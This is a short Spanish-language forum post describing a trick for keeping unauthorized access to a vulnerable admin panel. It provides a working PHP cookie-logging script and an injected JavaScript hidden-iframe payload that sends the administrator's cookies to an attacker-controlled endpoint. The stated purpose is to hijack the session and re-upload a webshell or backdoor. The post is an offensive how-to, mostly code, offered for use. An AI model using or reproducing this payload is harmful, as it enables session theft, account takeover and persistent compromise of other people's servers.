Buenas voy a ir directo al grano, este pequeño post no es un tutorial, es un truco el cual se me ha dado gracias a la imaginación y por averiguar, lo que no quiere decir que el método lo haya creado yo.
Se trata de asegurar nuestro acceso a un panel de administración vulnerable inyectando un script en js para robarle las cookies al administrador cada vez que acceda, para así, una vez obtenida las cookies usarlas y entrar para volver a subir nuestra webshell u otro backdoor que queramos subir al servidor.
El código php que he usado para robar las respectivas cookies es este:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
El script que llamaba al documento cookie es:
<script language="JavaScript">
document.write('<iframe src="http://127.0.0.1/?c='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');
</script>
Vídeo demo: